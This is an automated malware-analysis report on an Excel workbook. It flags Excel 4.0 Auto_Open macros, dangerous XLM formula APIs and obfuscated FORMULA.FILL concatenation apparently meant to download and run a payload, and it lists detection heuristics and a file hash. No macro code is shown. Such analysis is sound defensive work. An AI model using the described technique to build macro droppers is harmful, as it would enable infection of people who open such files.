MALICIOUS
Risk Score: 140
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1203 Exploitation for Client Execution
The sample contains Excel 4.0 macros, specifically an Auto_Open entry, which is a known technique for executing malicious code upon opening the workbook. The macro uses the FORMULA.FILL function with a complex, obfuscated string concatenation, likely to construct and execute a command. This indicates the file is designed to download and execute a secondary payload, leveraging the Auto_Open functionality for initial execution.
Heuristics (3)
- Excel 4.0 Auto_Open defined name (critical, OLE_XLM_AUTOOPEN_DEFINEDNAME): oletools recovered an Auto_Open / Auto_Close entry from an Excel 4.0 macro sheet. The raw BIFF name can be tokenized or partially opaque to byte-string checks, but the recovered macro listing confirms the workbook has an XLM auto-execution entry.
- XLM Auto_Open with dangerous formula APIs (critical, OLE_XLM_DANGEROUS_FN): Excel 4.0 macro sheet contains an Auto_Open / Auto_Close entry and dangerous XLM formula APIs that can invoke programs, write files, or transfer control without VBA.
- Excel 4.0 (XLM) macro sheet present (medium, OLE_XLM_AUTOOPEN): Workbook contains an Excel 4.0 macro sheet sub-stream; XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| xlm_macros.txt | xlm-macro | oletools.olevba.extract_all_macros (XLM macro listing) | 126406 bytes |

SHA-256: 4c8c9e161b27493ad6d41fa256269b55224bf0ff24fadd5ca60cad22944ba4a5
Preview script: first 1,000 lines of the extracted script